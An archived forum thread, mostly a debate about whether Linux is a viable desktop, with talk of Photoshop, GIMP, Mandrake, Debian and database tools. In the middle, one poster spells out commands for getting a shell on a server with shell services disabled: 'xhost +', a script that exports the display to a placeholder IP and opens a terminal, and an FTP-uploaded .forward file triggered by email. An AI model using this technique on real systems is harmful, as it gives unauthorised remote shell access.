|
Exploit?
Well,
you were running wu-ftpd? Exported X display? This I would like to know, since it seems that ftp is always a way to get in. And that you probably replaced some binaries of services still running with something that you could use to get a shell? Mitch |
ohh a debian zealot =)
I've played with debian, yes its nice but i can see why people complain about it, the installer is horrible. I"m still reasonably new to Linux, i can make things work but i'm no kernel hacker. Well holidays are coming up anyway so what the heck, ill try debian then. Did i say anything else about OSX cept thats its got a *nix base? Ill try and wine photoshop before i give it up, sorry but that one is just *too* dear to my heart. |
What you folks are going on about is exactly why I voted "no" on the "viable Linux desktop" question. Several months to get over the Windows addiction completely? Esoteric setup leading to root-able vulnerabilities? Nerdy buzzword-filled debate about different distributions? Emulators being a part of the dominance strategy?
Without question, open source will always lead to certain advantages. But as yet, all these advantages are by the geeks, for the geeks (understanding that I count myself in that description). It's still true: what any platform needs to succeed with the general public is compelling applications. What Linux needs, then, is a compelling app that somehow takes advantage of openness for its strength. There are already a few of these, such as embedded devices. Increased reliability and security. There need to be more. Maybe something in distributed computing for example. |
No exploit. No replaced binaries. Exported display - yes. So you're getting somewhere :)
I'll write more when I'm not on the phone. |
alrighty now...
jaggy - i know. wasn't talking about you specifically on the os x thing. but i see this all the time. same with linux. people talk about how cool it is but don't use it. photoshop is definitely hard to give up. i know - i did it two years ago. just let gimp take over. gimp's pretty powerful if you get into it.
anyway. tony - it all depends on what "viable linux desktop" is interpreted to mean. i'm writing this from my powermac g4 tower because it was convenient. i could still write it from linux. mozilla .9.5 is pretty slick (including the feature to kill popups from javascript onload & onunload - where has this option been in internet explorer?). to me, linux is a viable desktop. so is mac os x. so is mac os 9. so is windows. as a matter of fact, the only one i would say that isn't is beos. i couldn't use it for a desktop operating system. it's cool as hell, but it's just not there. windows has all the apps. linux has a ton. so does mac os. beos was severely lacking. it's all about the apps. well, and whether or not you can have multiple desktops, which is what i dig about linux. or just how great it is to use, which is what i dig about mac os x (that, and it's fast as hell, and it looks great, and it has so many cool features to it - an operating system done right). did i give up photoshop & 3d studio max? yeah. but i gained a lot more. all it takes to switch operating systems is getting into new habits. i can't go back to windows 'cause i'm too used to hitting alt+1 or alt+2 (up to +4) to getting to a different desktop. habit. another thing i've noticed - people tend to look down at operating systems that they've never really used. 5 years ago, i never said "macintosh" - i said "macintrash." i'd used it, but not thoroughly enough. when i got the g4 tower, the people in my office said "it looks nice, but i'd never use it" - why? it's the same thing as linux on the desktop. you need to really do it to be able to appreciate it and to make it work. her answer was "'cause it can't do what i need it to do." well HOW DO YOU KNOW? i do a LOT in linux. i can do a LOT in mac os x. aye. too tired to be coherent. mbpark - no exploits. wu-ftpd is what is running, but it's not an exploited version. here's what's granted: you have an account on the machine, you have root access as well. you canNOT get to a shell over telnet, ssh, rlogin, etc - all these services are off. i used: a shell script, an exported display, ftp and an email. 1 email. the question is, how did i execute the shell script? and what did it do? once i got a shell with that, it was as simple as su'ing and re-enabling ssh (which scott turned off in moment of really really bad judgement). but yeah. how did i get a shell? |
Getting that shell....
I'm thinking you have something akin to tunnelling via SMTP on that box? Either that, or you have a service that can be controlled via email?
I hardly know anything about Sendmail here. Mitch |
okay. you didn't get it. so i'll tell you what i did.
$ xhost + then... make a shell script - #!/bin/bash export DISPLAY=YOUR_IP_HERE /usr/bin/gnome-terminal # or whatever term you want to use then... $ echo "| /path/to/above/script.sh" > junk ftp MACHINE_WITH_NO_SHELL login: your account password: put script.sh script.sh put junk .forward then, email your account. the .forward executes the script, which exports the display to your machine and gives you a shell. took me a little while to come up with this one, but it's definitely going on the books as "good way to get into your machine that your tard friend & co-admin killed all shell access to" :) |
And I voted no also
The reason why is the apps.
There are many out there, however, they're not production-quality like Word, Excel, or even WordPerfect (still in use in more law firms than Word!). It's the apps. MacOS has that niche with video production and the visual arts, and with OSX.1 has finally surpassed the Amiga because of its wicked use of Firewire and apps that support it. For my DB work, all the good programs run on Windows. Try finding a copy of anything non-Rational that costs under 10K and does DB design. Only ERStudio does, and that's not that good under Linux, and requires a lot of setup for DB clients other than Oracle. Forget using MS SQL Server 2000 under that. Did I mention client-side Java is also a pig and is worse than a Pentium running Win2K? :). Scratch off Together then. I need apps outside the compilers and editors, which is what most of Linux seems to be anyway for apps. They don't exist on Linux, and I think it's because of demand. Linux's mentality is that most of the people won't pay for the good apps and will take a GNU substitute, which will do 40% of what you really need. The rest you really have to know your stuff to code around. The only major companies I have seen really supporting Linux apps are Sun, Oracle, Red Hat, Ximian, and Caldera. The only reason why for the first two is because Microsoft makes a DBMS, OS, and office suite. There's too much confusion over window managers, graphical environments, and the like to make commercial developers not have to deal with a support nightmare. Most of us don't have time to symlink and script our distro so that ERStudio and the Oracle Client will work. It would be an nightmare to make a commercial Linux app, especially because it would more than likely have close to a 100% piracy rate due to people not wanting to pay for Linux software. Also, the manufactured Gnome/KDE war on Slashdot by a bunch of skript kiddiez gives people a bad impression. In the minds of many people, slashdot = the linux community. There are very few good commercial Linux apps because people will not pay for them. Sad to say, but true. However, people seem to be willing to pay (at least part of the time) for tools for the Windows OS (and I pay dearly due to Embarcadero and BMC software on my machine). I use Windows for work because it has the apps I need. They have a very good IDE in Visual Studio 6.0. They have Office, and they have DB clients for every database known to man available for it. Threfore, I can do my job and don't have to spend half my time configuring my user environment. I like to be able to sit down and do work without having to code shell scripts half the time. KDE, Gnome, E, and the rest just are not there yet for apps. I'd like to do something about it, but I also have to work 50 hours a week to get paid and have a life at the same time. I use Linux occasionally, mainly for servers, and because it's a very good server OS. The desktop portion just is not there. It's getting there as an OS, but it doesn't have the apps that Windows does, especially for DB work. When it gets TOAD, SQL-Progammer 2001, a decent ERStudio, a software architecture package, an Oracle client that doesn't break when you look at it because the latest glibc and it hate each other, a DBArtisan that doesn't need Linux kludging, and a UNIFIED CLIPBOARD under X, then I'll consider it ready. Until then, I'll continue to use Linux for home, web server work, and as a good firewall. |
Hmm, for alot of pro stuff you have a point but i see the real battle at home desktops for now. This is why mandrake excited me, its nearly as easy to pick up as windows, all nice pretty GUIs. Comes iwht *shitloads* of apps including KOffice. SO far i've converted almsot completely 4 people, one of them used to be a msft zealot too! Eventully ill migrate them to Debian =P.
Games already have a 80% piracy rate, and the killer app I believe for Linux will be when games are simulatoiniously for both Windows and Linux. XP should help too, upgrade your graphics card and your OS dosen't work? Fuck that! If Transgamers come though with the DirectX port that will help *alot* too. Standarisation is a huge issue i know, and really is the crux of the issue... People will never pay for software unless they are forced to (this goes back to my previous point on another thread about digital replication and basic economic structure. I think people will liek the way, for free they can download Mandrake, install it with a nice, easy to use GUI installer (which is something IMHO debian do need to work on) and have a working desktop, with easy config tools and all the apps you could need. Shit easy to set up net access too! The other one is the Apt-like update system, makes it very easy to keep everything up to date and get new apps (thier 'cooker' servers which are part of the update program have literally thousands of RPMs constructed for Mandrake making it very easy to get what you need). Mbpark and UNdertoad both have a point, but its getting alot closer and i really do feel Mandrake have the right idea, particualry this gaming edition. I'm really hoping they release a free version that has scripts fo grab common games off windoze partitions and set up Wine for them, that alone would help convert alot of people. And sorry but ill give up my photoshop when they pry it out of my dead, cold hands =P |
Quote:
If a web server is running, you can do the same trick with CGI scripts. |
heh. well, i personally wasn't aware of anything beforehand that exploited that. but i'm only 20, so go figure :) it kinda dropped into my head like a ton of bricks, i tried executing one and it worked, so i was like "holy shit!" and then i spent another few minutes thinking about how i could leverage that to get a shell... then it hit me - exported X display! so... the thing i thought was cool about it was that it was totally non-destructive and relatively simple. it took some thinking to come up with it, but it's not something ridiculously complex or anything like that. and it worked perfectly.
now, if scott ever kills ssh AND ftp... :) |
Linux is an OS designed by programmers, FOR programmers (and power users). If you don't like writing shells scripts, or spending a significant portion of your time at the command line, then Linux is just not for you.
Anyway, what's so good about the Visual Studio IDE? Give me a unix command line any day. Moving the mouse around and clicking on things is just not as efficient as typing it. As for the clipboard, I don't really know what you mean. I use Enlightenment, and can cut and paste just fine between everything. As for Word and Photoshop,I am a home user, so I don't need all those missing advanced features. The most I would use from a word processor would be bold, underline, italics, font sizes, and spell-checking. Mostly just for essays for school. The most I ever use Gimp for is resizing pictures for my web page (and I don't even use it for that anymore..i found a python script that resizes them and creates the html page for you. :] ) Now, if the other guy on this pages uses and loves ALL of Photoshop, then I would never advocate him "settling for less". That's just stupid. But for people who aren't using those features, it's not settling for less at all. I can't speak for the database stuff. I know that Linux has MySQL and PostgreSQL, but I dunno how good they are. Anyway, i'm being pulled into an IM chat now, so to sum up: linux is better, so nyah! :] |
Re: And I voted no also
Quote:
But then, I like BlueJ as a Java IDE, so I guess I'm just not tuned in to modern programming tools. Like Fluffy++, ferinstance http://voicenet.com/~maggie/fluffy++.jpg Quote:
|
LOL....man that GUI is hilarious. Like I said -- give me a command line for programming any day.
|
Quote:
|
| All times are GMT -5. The time now is 03:19 AM. |
Powered by: vBulletin Version 3.8.1
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.